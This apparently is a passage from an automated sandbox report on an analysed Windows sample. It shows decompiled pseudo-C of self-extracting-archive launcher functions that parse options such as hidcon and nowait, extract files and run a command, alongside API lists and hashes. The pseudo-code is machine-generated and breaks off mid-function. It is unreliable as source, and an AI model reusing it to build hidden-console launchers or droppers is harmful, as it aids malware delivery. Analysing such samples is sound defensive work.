                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: DiskFreeMessageSendSpace
                                          • String ID:
                                          • API String ID: 696007252-0
                                          • Opcode ID: 34fedf2ad7fc010070f55429fd0060592675988d9c8f944df9a105f38321c0a6
                                          • Instruction ID: be724390365365ade20085aba8859a3f911814d7ca7ed58b5616de4d2c55ee22
                                          • Opcode Fuzzy Hash: 34fedf2ad7fc010070f55429fd0060592675988d9c8f944df9a105f38321c0a6
                                          • Instruction Fuzzy Hash: 1F014F70600204BADB249F10DE49B5A3BA9EB01B04F904476E501FA1E0D7FADE418A1D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402008, Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 242COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E00402008(signed int* __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8, signed int _a12) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v32;
				char _v44;
				char _v56;
				char _v68;
				char _v80;
				char _v92;
				char _v104;
				char _v120;
				void* _t55;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t64;
				signed int _t65;
				signed int _t66;
				signed int _t75;
				long _t77;
				long _t80;
				signed int _t88;
				signed int _t149;
				signed int* _t151;
				signed int _t152;
				signed int _t155;
				signed int _t156;
				void* _t157;

				_t151 = __ecx;
				_t159 = 0;
				_v20 = __edx;
				_v12 = 0;
				E004147DF(_t55,  &_v32);
				E00404255( &_v120, __edx, 0, _v20);
				_v16 = 0;
				_v5 = 0;
				E00405546(_t151, 0);
				_t152 =  *_t151;
				while(1) {
					L1:
					_t59 = E00404051(_t152, _t159, 0);
					_t159 = _t59;
					if(_t59 != 0) {
						break;
					}
					_t60 = E00404051(_t152, __eflags, 0);
					__eflags = _t60;
					if(__eflags != 0) {
						_v12 = _v12 | 0x00000001;
						_t152 = _t60;
						continue;
					}
					_t61 = E00404051(_t152, __eflags, 0);
					__eflags = _t61;
					if(__eflags != 0) {
						_t152 = _t61;
						__eflags =  *0x422740; // 0x1
						if(__eflags != 0) {
							L10:
							_v12 = _v12 | 0x00010000;
						}
						continue;
						L11:
						_t63 = E00404051(_t152, __eflags, 2);
						_t149 = _t63;
						__eflags = _t149;
						if(__eflags != 0) {
							__eflags =  *0x422468 - 0xffffffff;
							if(__eflags == 0) {
								_t156 = _t152 + 4;
								__eflags = _t156;
								__imp___wtol(_t156);
								 *0x422468 = _t63;
							}
							_t152 = _t149;
							continue;
						}
						_t64 = E00404051(_t152, __eflags, 3);
						__eflags = _t64;
						if(__eflags != 0) {
							L17:
							_t152 = _t64;
							continue;
						}
						_t64 = E00404051(_t152, __eflags, 3);
						__eflags = _t64;
						if(__eflags != 0) {
							goto L17;
						}
						_t65 = E004040D6(_t152, __eflags);
						__eflags = _t65;
						if(__eflags != 0) {
							_t152 = _t65;
							_v16 = 1;
							continue;
						}
						_t66 = E0040413E(_t152, __eflags);
						__eflags = _t66;
						if(__eflags != 0) {
							_t152 = _t66;
							_v16 = 2;
							continue;
						}
						_t150 = "\"";
						__eflags = _a4;
						if(_a4 == 0) {
							E004148C7( &_v32, _a8);
							goto L29;
						} else {
							__eflags =  *_t152 - 0x22;
							if( *_t152 == 0x22) {
								E00414864( &_v32, _t152);
							} else {
								E00414864( &_v32, "\"");
								E00414922( &_v32, _t152);
								E00414922( &_v32, "\"");
							}
							_t152 = E00404F59();
							__eflags = _t152;
							if(_t152 != 0) {
								E00414922( &_v32, " ");
								L29:
								_t68 = E00414922( &_v32, _t152);
							}
						}
						E004147DF(_t68,  &_v56);
						E00414803( &_v44, E00403022(_v32,  &_v56));
						E00405546( &_v56, __eflags);
						__eflags =  *0x4228d8; // 0x0
						if(__eflags == 0) {
							_t75 = E00401C2A(_v16);
							__eflags = _t75;
							if(_t75 == 0) {
								goto L42;
							} else {
								_t155 = _a12;
								__eflags =  *_t155;
								if(__eflags != 0) {
									E00414922( &_v44, _t155);
									while(1) {
										__eflags =  *_t155;
										if(__eflags == 0) {
											goto L36;
										}
										_t155 = _t155 + 2;
										__eflags = _t155;
									}
								}
								L36:
								E00405546( &_v44, __eflags);
								__eflags = _v5;
								if(__eflags != 0) {
									_t144 = _v44;
									_t77 = E00401D63(_v56, _v44, __eflags, _v12);
									__eflags = _t77;
									if(_t77 != 0) {
										SetLastError(_t77);
										goto L44;
									} else {
										goto L41;
									}
								} else {
									E00414803( &_v68,  *((intOrPtr*)(E0041476B( &_v80, E00414787( &_v92, E004147B1( &_v104, _t150,  &_v56), L"\" "),  &_v44))));
									_push(_v80);
									L0041C160();
									_push(_v92);
									L0041C160();
									_push(_v104);
									L0041C160();
									_t144 = _v12;
									_t157 = _t157 + 0xc;
									_t88 = E00401C59(_v68, _v12, __eflags, _v20); // executed
									_push(_v68);
									__eflags = _t88;
									if(_t88 == 0) {
										L0041C160();
										L44:
										__eflags =  *0x422774 & 0x00000010;
										if(( *0x422774 & 0x00000010) == 0) {
											L46:
											E00409684(_t144, 1, 0x10, _v32);
										} else {
											_t80 = GetLastError();
											__eflags = _t80 - 0x4c7;
											if(_t80 != 0x4c7) {
												goto L46;
											}
										}
										E00405A7A();
										_push(9);
										_pop(1);
									} else {
										L0041C160();
										L41:
										E00401BCE();
										goto L42;
									}
								}
							}
						}
						_push(_v44);
						L0041C160();
						_push(_v56);
						L0041C160();
						E00402FC9( &_v120);
						_push(_v32);
						L0041C160();
						return 1;
					}
					_t62 = E00404051(_t152, __eflags, 0);
					__eflags = _t62;
					if(__eflags != 0) {
						_t152 = _t62;
						goto L10;
					}
					goto L11;
				}
				_t152 = _t59;
				_v5 = 1;
				goto L1;
			}


































                                          0x00402010
                                          0x00402012
                                          0x00402018
                                          0x0040201b
                                          0x0040201e
                                          0x00402029
                                          0x00402030
                                          0x00402033
                                          0x00402036
                                          0x0040203b
                                          0x0040203d
                                          0x0040203d
                                          0x00402045
                                          0x0040204a
                                          0x0040204c
                                          0x00000000
                                          0x00000000
                                          0x0040205e
                                          0x00402063
                                          0x00402065
                                          0x00402067
                                          0x0040206b
                                          0x00000000
                                          0x0040206b
                                          0x00402077
                                          0x0040207c
                                          0x0040207e
                                          0x00402080
                                          0x00402082
                                          0x00402088
                                          0x0040209f
                                          0x0040209f
                                          0x0040209f
                                          0x00000000
                                          0x004020a8
                                          0x004020b1
                                          0x004020b6
                                          0x004020b8
                                          0x004020ba
                                          0x004020bc
                                          0x004020c3
                                          0x004020c5
                                          0x004020c5
                                          0x004020c9
                                          0x004020d0
                                          0x004020d0
                                          0x004020d5
                                          0x00000000
                                          0x004020d5
                                          0x004020e5
                                          0x004020ea
                                          0x004020ec
                                          0x00402100
                                          0x00402100
                                          0x00000000
                                          0x00402100
                                          0x004020f7
                                          0x004020fc
                                          0x004020fe
                                          0x00000000
                                          0x00000000
                                          0x00402109
                                          0x0040210e
                                          0x00402110
                                          0x00402112
                                          0x00402114
                                          0x00000000
                                          0x00402114
                                          0x00402122
                                          0x00402127
                                          0x00402129
                                          0x0040212b
                                          0x0040212d
                                          0x00000000
                                          0x0040212d
                                          0x00402139
                                          0x00402141
                                          0x00402144
                                          0x00402190
                                          0x00000000
                                          0x00402146
                                          0x00402146
                                          0x0040214a
                                          0x00402167
                                          0x0040214c
                                          0x0040214d
                                          0x00402156
                                          0x0040215f
                                          0x0040215f
                                          0x00402178
                                          0x0040217a
                                          0x0040217c
                                          0x00402186
                                          0x00402195
                                          0x00402199
                                          0x00402199
                                          0x0040217c
                                          0x004021a1
                                          0x004021b5
                                          0x004021bd
                                          0x004021c2
                                          0x004021c8
                                          0x004021d1
                                          0x004021d6
                                          0x004021d8
                                          0x00000000
                                          0x004021de
                                          0x004021de
                                          0x004021e1
                                          0x004021e4
                                          0x004021ea
                                          0x004021f4
                                          0x004021f4
                                          0x004021f7
                                          0x00000000
                                          0x00000000
                                          0x004021f1
                                          0x004021f1
                                          0x004021f1
                                          0x004021f4
                                          0x004021f9
                                          0x004021fc
                                          0x00402201
                                          0x00402204
                                          0x0040227e
                                          0x00402284
                                          0x00402289
                                          0x0040228b
                                          0x00402298
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00402206
                                          0x00402236
                                          0x0040223b
                                          0x0040223e
                                          0x00402243
                                          0x00402246
                                          0x0040224b
                                          0x0040224e
                                          0x00402253
                                          0x00402259
                                          0x0040225f
                                          0x00402264
                                          0x00402267
                                          0x00402269
                                          0x00402273
                                          0x0040229e
                                          0x0040229e
                                          0x004022a5
                                          0x004022b4
                                          0x004022bb
                                          0x004022a7
                                          0x004022a7
                                          0x004022ad
                                          0x004022b2
                                          0x00000000
                                          0x00000000
                                          0x004022b2
                                          0x004022c3
                                          0x004022c8
                                          0x004022ca
                                          0x0040226b
                                          0x0040226b
                                          0x0040228d
                                          0x0040228d
                                          0x00000000
                                          0x0040228d
                                          0x00402269
                                          0x00402204
                                          0x004021d8
                                          0x004022cb
                                          0x004022ce
                                          0x004022d3
                                          0x004022d6
                                          0x004022e0
                                          0x004022e5
                                          0x004022e8
                                          0x004022f4
                                          0x004022f4
                                          0x00402094
                                          0x00402099
                                          0x0040209b
                                          0x0040209d
                                          0x00000000
                                          0x0040209d
                                          0x00000000
                                          0x0040209b
                                          0x0040204e
                                          0x00402050
                                          0x00000000

                                          APIs
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                            • Part of subcall function 00404255: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0042289C,?,?,00000000,0040202E,00000000,0042289C,?,00000000), ref: 00404273
                                            • Part of subcall function 00404255: GetCurrentDirectoryW.KERNEL32(00000000,00000000,00000000,?,00000000,0040202E,00000000,0042289C,?,00000000), ref: 00404286
                                          • _wtol.MSVCRT(?,00000002,00000000,00000000,00000000,00000000,00000000,0042289C,?,00000000), ref: 004020C9
                                            • Part of subcall function 00414864: ??2@YAPAXI@Z.MSVCRT ref: 00414896
                                            • Part of subcall function 00414864: ??3@YAXPAX@Z.MSVCRT ref: 0041489F
                                            • Part of subcall function 00414864: memcpy.MSVCRT ref: 004148B7
                                            • Part of subcall function 004148C7: ??2@YAPAXI@Z.MSVCRT ref: 004148EF
                                            • Part of subcall function 004148C7: ??3@YAXPAX@Z.MSVCRT ref: 004148F8
                                            • Part of subcall function 004148C7: memcpy.MSVCRT ref: 00414912
                                            • Part of subcall function 00414922: memcpy.MSVCRT ref: 0041494F
                                            • Part of subcall function 00414803: memcpy.MSVCRT ref: 00414829
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040223E
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00402246
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040224E
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040226B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00402273
                                            • Part of subcall function 00401D63: GetCommandLineW.KERNEL32(0041D9F0,00000000,00000000), ref: 00401D85
                                            • Part of subcall function 00401D63: ??3@YAXPAX@Z.MSVCRT ref: 00401E31
                                            • Part of subcall function 00401D63: ??3@YAXPAX@Z.MSVCRT ref: 00401E39
                                            • Part of subcall function 00401D63: ??3@YAXPAX@Z.MSVCRT ref: 00401E41
                                            • Part of subcall function 00401D63: ??3@YAXPAX@Z.MSVCRT ref: 00401E49
                                            • Part of subcall function 00401D63: ??3@YAXPAX@Z.MSVCRT ref: 00401E51
                                            • Part of subcall function 00401D63: ??3@YAXPAX@Z.MSVCRT ref: 00401E59
                                            • Part of subcall function 00401D63: ??3@YAXPAX@Z.MSVCRT ref: 00401E61
                                            • Part of subcall function 00401D63: ??3@YAXPAX@Z.MSVCRT ref: 00401E69
                                            • Part of subcall function 00401D63: ??3@YAXPAX@Z.MSVCRT ref: 00401E71
                                            • Part of subcall function 00401D63: ??3@YAXPAX@Z.MSVCRT ref: 00401E79
                                            • Part of subcall function 00401D63: GetStartupInfoW.KERNEL32(?,00000022,?,00000020,?,?,00000000,0000003A,?," -,sfxwaitall), ref: 00401E8C
                                          • SetLastError.KERNEL32(00000000,?,00000000,?,?,00000003,00000003,00000002,00000000,00000000,00000000,00000000,00000000,0042289C,?,00000000), ref: 00402298
                                          • GetLastError.KERNEL32(00000000,0042289C,?,00000000), ref: 004022A7
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004022CE
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004022D6
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004022E8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$memcpy$??2@$CurrentDirectoryErrorLast$CommandInfoLineStartup_wtol
                                          • String ID: ExecuteParameters$del$forcenowait$hidcon$nowait$shc$waitall
                                          • API String ID: 3919891259-4019298132
                                          • Opcode ID: 78c2db777d54e32d3a651111b1cc7907bfb33c2b980e204299ca58bfd11eeace
                                          • Instruction ID: 21408dceba26f159f852cac34e7ef5db61450a97c3c3bcaf1411dbce6cc4b37b
                                          • Opcode Fuzzy Hash: 78c2db777d54e32d3a651111b1cc7907bfb33c2b980e204299ca58bfd11eeace
                                          • Instruction Fuzzy Hash: 40818E71E00219ABCB14BBA1D985AEF7775AB80304F24407FE612772D1DABC5D86CB4D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004028F2, Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 294COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E004028F2(signed int* _a4, long _a8, signed int* _a12, signed int _a16) {
				char _v16;
				signed int _v24;
				char _v28;
				long _v32;
				signed int _v36;
				short _v42;
				signed short _v44;
				signed int _v52;
				short _v58;
				signed int _v60;
				struct _SYSTEMTIME _v76;
				signed int _t108;
				intOrPtr* _t110;
				signed int _t111;
				signed int _t116;
				intOrPtr* _t119;
				intOrPtr* _t122;
				signed int _t123;
				intOrPtr* _t125;
				signed int _t126;
				intOrPtr* _t130;
				signed int _t131;
				signed int _t132;
				signed int _t136;
				signed int _t138;
				signed int _t141;
				signed int _t149;
				signed int _t150;
				signed int _t151;
				signed int _t152;
				signed int _t154;
				signed int _t161;
				signed int _t171;
				intOrPtr _t184;
				signed int* _t211;
				intOrPtr* _t213;
				intOrPtr* _t218;
				signed int _t219;
				intOrPtr _t221;

				_t221 =  *0x4228cc; // 0x0
				if(_t221 == 0) {
					 *_a12 = 0;
					__eflags = _a16;
					if(_a16 == 0) {
						_t218 = _a4;
						_t211 = _t218 + 0x20;
						_t108 =  *_t211;
						_a4 = _t211;
						__eflags = _t108;
						if(_t108 != 0) {
							 *((intOrPtr*)( *_t108 + 8))(_t108);
							 *_t211 = 0;
						}
						_v60 = 0;
						_v58 = 0;
						_t110 =  *0x4227c0; // 0x9d2680
						_v52 = 0;
						_t111 =  *((intOrPtr*)( *_t110 + 0x18))(_t110, _a8, 3,  &_v60);
						__eflags = _t111;
						if(_t111 == 0) {
							E004147DF(_t111,  &_v16);
							__eflags = _v60;
							if(_v60 == 0) {
								L50:
								_t219 =  *((intOrPtr*)( *_t218 + 0x1c))(_t218, 0x64);
								L51:
								_push(_v16);
								L0041C160();
								L52:
								goto L53;
							}
							__eflags = _v60 - 8;
							if(_v60 != 8) {
								goto L50;
							}
							E00414864( &_v16, _v52);
							_t119 = E0041476B( &_v28, _t218 + 0xc,  &_v16);
							_t213 = _t218 + 0x24;
							E00414864(_t213,  *_t119);
							L0041C160();
							_v44 = 0;
							_v42 = 0;
							_t122 =  *0x4227c0; // 0x9d2680
							_v36 = 0;
							_t123 =  *((intOrPtr*)( *_t122 + 0x18))(_t122, _a8, 9,  &_v44, _v28);
							_a16 = _t123;
							__eflags = _t123;
							if(_t123 == 0) {
								__eflags = _v44;
								if(_v44 != 0) {
									__eflags = _v44 - 0x13;
									if(_v44 == 0x13) {
										 *((intOrPtr*)(_t218 + 0x44)) = _v36;
										L20:
										_t125 =  *0x4227c0; // 0x9d2680
										_t126 =  *((intOrPtr*)( *_t125 + 0x18))(_t125, _a8, 6,  &_v44);
										_a16 = _t126;
										__eflags = _t126;
										if(_t126 != 0) {
											goto L11;
										}
										__eflags = _v36;
										_t207 =  &_v44;
										 *(_t218 + 0x40) = 0 | _v36 != 0x00000000;
										_t130 =  *0x4227c0; // 0x9d2680
										_t131 =  *((intOrPtr*)( *_t130 + 0x18))(_t130, _a8, 0xc,  &_v44);
										_a8 = _t131;
										__eflags = _t131;
										if(_t131 == 0) {
											_t132 = _v44 & 0x0000ffff;
											__eflags = _t132;
											if(_t132 == 0) {
												GetLocalTime( &_v76);
												_t170 = _t218 + 0x38;
												SystemTimeToFileTime( &_v76, _t218 + 0x38);
												L28:
												__eflags =  *(_t218 + 0x40);
												_t184 =  *_t213;
												if( *(_t218 + 0x40) == 0) {
													_t136 = E00404402(_t184, _t170); // executed
													__eflags = _t136 - 0xffffffff;
													if(_t136 == 0xffffffff) {
														_t138 =  *((intOrPtr*)( *_t218 + 0x20))(_t218, 0x69, GetLastError());
														L17:
														_t219 = _t138;
														L18:
														E00414129( &_v44);
														goto L51;
													}
													__eflags = _t136 - 1;
													if(_t136 == 1) {
														L31:
														E00414129( &_v44);
														_push(_v16);
														L0041C160();
														_t219 = 0;
														goto L52;
													}
													_push(0x18);
													L0041C16C();
													_t171 = 0;
													__eflags = _t136;
													if(_t136 != 0) {
														 *((intOrPtr*)(_t136 + 4)) = 0;
														 *_t136 = 0x41db9c;
														_t67 = _t136 + 8;
														 *_t67 =  *(_t136 + 8) | 0xffffffff;
														__eflags =  *_t67;
														_t171 = _t136;
													}
													 *(_t218 + 0x1c) = _t171;
													__eflags = _t171;
													if(_t171 != 0) {
														 *((intOrPtr*)( *_t171 + 4))(_t171);
													}
													_t141 =  *(_t218 + 0x1c);
													 *(_t141 + 0x10) =  *(_t141 + 0x10) & 0x00000000;
													 *(_t141 + 0x14) =  *(_t141 + 0x14) & 0x00000000;
													__eflags = E00414091( *_t213, 1);
													if(__eflags != 0) {
														L48:
														E004160A2(_a4, _t171);
														 *_a12 = _t171;
														E00414129( &_v44);
														_push(_v16);
														L0041C160();
														E00414129( &_v60);
														_t116 = 0;
														goto L54;
													} else {
														_a8 = GetLastError();
														E00414839( &_v28, _t213);
														_t149 = E00403813( &_v28, __eflags);
														__eflags = _t149;
														if(_t149 >= 0) {
															_v24 = _t149;
															 *((short*)(_v28 + _t149 * 2)) = 0;
															_t150 = E0040468A(_v28, _v28);
															__eflags = _t150;
															if(_t150 != 0) {
																_t151 =  *(_t218 + 0x1c);
																 *(_t151 + 0x10) =  *(_t151 + 0x10) & 0x00000000;
																 *(_t151 + 0x14) =  *(_t151 + 0x14) & 0x00000000;
																_t152 = E00414091( *_t213, 1);
																__eflags = _t152;
																if(_t152 != 0) {
																	_push(_v28);
																	L0041C160();
																	goto L48;
																}
																_t154 =  *((intOrPtr*)( *_t218 + 0x20))(_t218, 0x6a, GetLastError());
																L41:
																_push(_v28);
																_t219 = _t154;
																L0041C160();
																__eflags = _t171;
																if(_t171 != 0) {
																	 *((intOrPtr*)( *_t171 + 8))(_t171);
																}
																goto L18;
															}
															_t154 =  *((intOrPtr*)( *_t218 + 0x1c))(_t218, 0x68);
															goto L41;
														}
														_t154 =  *((intOrPtr*)( *_t218 + 0x20))(_t218, 0x6a, _a8);
														goto L41;
													}
												}
												_t161 = E0040468A(_t184, _t207);
												__eflags = _t161;
												if(_t161 != 0) {
													goto L31;
												}
												_push(0x68);
												L16:
												_t138 =  *((intOrPtr*)( *_t218 + 0x1c))(_t218);
												goto L17;
											}
											__eflags = _t132 - 0x40;
											if(_t132 == 0x40) {
												_t170 = _t218 + 0x38;
												_t170->dwLowDateTime = _v36;
												_t170->dwHighDateTime = _v32;
												goto L28;
											}
											_push(0x66);
											goto L16;
										}
										E00414129( &_v44);
										_push(_v16);
										L0041C160();
										_t219 = _a8;
										goto L52;
									}
									_push(0x65);
									goto L16;
								}
								 *((intOrPtr*)(_t218 + 0x44)) = 0;
								goto L20;
							}
							L11:
							E00414129( &_v44);
							_push(_v16);
							L0041C160();
							_t219 = _a16;
							goto L52;
						} else {
							_t219 = _t111;
							L53:
							E00414129( &_v60);
							_t116 = _t219;
							L54:
							return _t116;
						}
					}
					return 0;
				}
				return 0x80004004;
			}










































                                          0x004028fb
                                          0x00402901
                                          0x00402910
                                          0x00402912
                                          0x00402915
                                          0x0040291f
                                          0x00402923
                                          0x00402926
                                          0x00402928
                                          0x0040292b
                                          0x0040292d
                                          0x00402932
                                          0x00402935
                                          0x00402935
                                          0x00402942
                                          0x00402946
                                          0x0040294a
                                          0x0040294f
                                          0x00402955
                                          0x00402958
                                          0x0040295a
                                          0x00402966
                                          0x0040296b
                                          0x0040296f
                                          0x00402c20
                                          0x00402c28
                                          0x00402c2a
                                          0x00402c2a
                                          0x00402c2d
                                          0x00402c32
                                          0x00000000
                                          0x00402c32
                                          0x00402975
                                          0x0040297a
                                          0x00000000
                                          0x00000000
                                          0x00402986
                                          0x00402995
                                          0x0040299c
                                          0x004029a1
                                          0x004029a9
                                          0x004029ba
                                          0x004029be
                                          0x004029c2
                                          0x004029c7
                                          0x004029cd
                                          0x004029d0
                                          0x004029d3
                                          0x004029d5
                                          0x004029ef
                                          0x004029f3
                                          0x004029fa
                                          0x004029ff
                                          0x00402a1b
                                          0x00402a1e
                                          0x00402a1e
                                          0x00402a2f
                                          0x00402a32
                                          0x00402a35
                                          0x00402a37
                                          0x00000000
                                          0x00000000
                                          0x00402a3b
                                          0x00402a3f
                                          0x00402a4b
                                          0x00402a4e
                                          0x00402a56
                                          0x00402a59
                                          0x00402a5c
                                          0x00402a5e
                                          0x00402a78
                                          0x00402a7c
                                          0x00402a7e
                                          0x00402aa0
                                          0x00402aa6
                                          0x00402aae
                                          0x00402ab4
                                          0x00402ab4
                                          0x00402ab8
                                          0x00402aba
                                          0x00402ae5
                                          0x00402aea
                                          0x00402aed
                                          0x00402c18
                                          0x00402a09
                                          0x00402a09
                                          0x00402a0b
                                          0x00402a0e
                                          0x00000000
                                          0x00402a0e
                                          0x00402af3
                                          0x00402af6
                                          0x00402acc
                                          0x00402acf
                                          0x00402ad4
                                          0x00402ad7
                                          0x00402adc
                                          0x00000000
                                          0x00402adc
                                          0x00402af8
                                          0x00402afa
                                          0x00402aff
                                          0x00402b02
                                          0x00402b04
                                          0x00402b06
                                          0x00402b09
                                          0x00402b0f
                                          0x00402b0f
                                          0x00402b0f
                                          0x00402b13
                                          0x00402b13
                                          0x00402b15
                                          0x00402b18
                                          0x00402b1a
                                          0x00402b1f
                                          0x00402b1f
                                          0x00402b24
                                          0x00402b27
                                          0x00402b2b
                                          0x00402b3a
                                          0x00402b3c
                                          0x00402be1
                                          0x00402be5
                                          0x00402bf0
                                          0x00402bf2
                                          0x00402bf7
                                          0x00402bfa
                                          0x00402c03
                                          0x00402c08
                                          0x00000000
                                          0x00402b42
                                          0x00402b4c
                                          0x00402b4f
                                          0x00402b57
                                          0x00402b5c
                                          0x00402b5e
                                          0x00402b8e
                                          0x00402b91
                                          0x00402b98
                                          0x00402b9d
                                          0x00402b9f
                                          0x00402bad
                                          0x00402bb0
                                          0x00402bb4
                                          0x00402bbe
                                          0x00402bc3
                                          0x00402bc5
                                          0x00402bd8
                                          0x00402bdb
                                          0x00000000
                                          0x00402be0
                                          0x00402bd3
                                          0x00402b6b
                                          0x00402b6b
                                          0x00402b6e
                                          0x00402b70
                                          0x00402b76
                                          0x00402b78
                                          0x00402b81
                                          0x00402b81
                                          0x00000000
                                          0x00402b78
                                          0x00402ba6
                                          0x00000000
                                          0x00402ba6
                                          0x00402b68
                                          0x00000000
                                          0x00402b68
                                          0x00402b3c
                                          0x00402abc
                                          0x00402ac1
                                          0x00402ac3
                                          0x00000000
                                          0x00000000
                                          0x00402ac5
                                          0x00402a03
                                          0x00402a06
                                          0x00000000
                                          0x00402a06
                                          0x00402a80
                                          0x00402a83
                                          0x00402a8f
                                          0x00402a92
                                          0x00402a97
                                          0x00000000
                                          0x00402a97
                                          0x00402a85
                                          0x00000000
                                          0x00402a85
                                          0x00402a63
                                          0x00402a68
                                          0x00402a6b
                                          0x00402a70
                                          0x00000000
                                          0x00402a70
                                          0x00402a01
                                          0x00000000
                                          0x00402a01
                                          0x004029f5
                                          0x00000000
                                          0x004029f5
                                          0x004029d7
                                          0x004029da
                                          0x004029df
                                          0x004029e2
                                          0x004029e7
                                          0x00000000
                                          0x0040295c
                                          0x0040295c
                                          0x00402c33
                                          0x00402c36
                                          0x00402c3b
                                          0x00402c3d
                                          0x00000000
                                          0x00402c3e
                                          0x0040295a
                                          0x00000000
                                          0x00402917
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID: &@
                                          • API String ID: 0-1362318888
                                          • Opcode ID: 6b404e0bb22cf63d80f32e281185e3a78eeeff0b0969da7a8ad0899a509df477
                                          • Instruction ID: 0c2c45a1d49559d50b2892bbdf1ddf1765a092562d7aa30539bf8f0f12bc17d3
                                          • Opcode Fuzzy Hash: 6b404e0bb22cf63d80f32e281185e3a78eeeff0b0969da7a8ad0899a509df477
                                          • Instruction Fuzzy Hash: 42B16171A00205AFCB20EFA4C9889EE77B5FF48314F14452AF502BB2D1DBB89985CF59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402CB1, Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 230COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 83%
                                          			E00402CB1(intOrPtr* __ecx, void* __edx, void* __eflags) {
				char _v5;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v24;
				char* _v28;
				signed int _v32;
				short _v36;
				short _v40;
				intOrPtr* _v44;
				char _v56;
				char _v68;
				char _v80;
				signed int _v88;
				char _v92;
				short _v94;
				char _v96;
				char _v104;
				signed int _t93;
				signed int _t96;
				signed int _t97;
				signed int _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr* _t104;
				signed int _t105;
				signed int _t108;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				signed int _t114;
				signed int _t115;
				signed int _t118;
				signed int _t119;
				char* _t132;
				intOrPtr _t147;
				void* _t175;
				signed int _t177;
				char* _t181;
				intOrPtr _t182;
				signed int _t186;
				intOrPtr _t190;
				intOrPtr _t191;

				_t175 = __edx;
				 *0x422774 =  *0x422774 & 0xfffffff7;
				_v44 = __ecx;
				_v40 = 0;
				_t93 = E00401303(0x4227b8, __eflags);
				if(_t93 != 0) {
					__eflags =  *0x4228d8 - 2;
					if( *0x4228d8 == 2) {
						L9:
						_push(0x48);
						L0041C16C();
						__eflags = _t93;
						if(_t93 == 0) {
							_v36 = 0;
						} else {
							_v36 = E004025B4(_t93);
						}
						_t181 = L"ExtractMaskInclude";
						E00402C44(_t181);
						_t132 = L"ExtractMaskExclude";
						E00402C44(_t132);
						__eflags =  *0x422774 & 0x00000020;
						_v28 = _t132;
						_v20 = _t181;
						if(( *0x422774 & 0x00000020) != 0) {
							_v28 = _t181;
							_v20 = _t132;
						}
						_t96 = E00404F59();
						__eflags = _t96;
						if(_t96 == 0) {
							E004147DF(E004147DF(_t96,  &_v104),  &_v92);
							E00414864( &_v104, _v20);
							E00414864( &_v92, 0x41dbb8);
							E0040287B( &_v104, 0x4227a0, 0,  &_v104);
							_push(_v92);
							L0041C160();
							_push(_v104);
							L0041C160();
						}
						_t97 = E0040115F(0x4227b8);
						_t177 = 4;
						_v32 = _t97;
						_t178 = _t97 * _t177 >> 0x20;
						_t98 = _t97 * _t177;
						_push( ~(0 | __eflags > 0x00000000) | _t98);
						L0041C16C();
						_t182 = 0;
						_t186 = 0;
						_v24 = _t98;
						__eflags = _v32;
						if(_v32 <= 0) {
							L39:
							_t147 = _v36;
							 *((intOrPtr*)(_t147 + 0x30)) = _v24;
							 *(_t147 + 0x34) = _t186;
							__eflags = _t186;
							if(_t186 != 0) {
								_t102 = E00402766(_t147, _t178,  *_v44); // executed
								_v40 = _t102;
							}
							_push(_v24);
							L0041C160();
							_t100 = _v40;
							L42:
							L43:
							return _t100;
						} else {
							do {
								_v88 = _v88 & 0;
								_t178 =  &_v96;
								_v96 = 0;
								_v94 = 0;
								_t104 =  *0x4227c0; // 0x9d2680
								_t105 =  *((intOrPtr*)( *_t104 + 0x18))(_t104, _t182, 3,  &_v96);
								__eflags = _t105;
								if(_t105 != 0) {
									goto L38;
								}
								__eflags = _v96 - 8;
								if(_v96 != 8) {
									goto L38;
								}
								E00414803( &_v56, _v88);
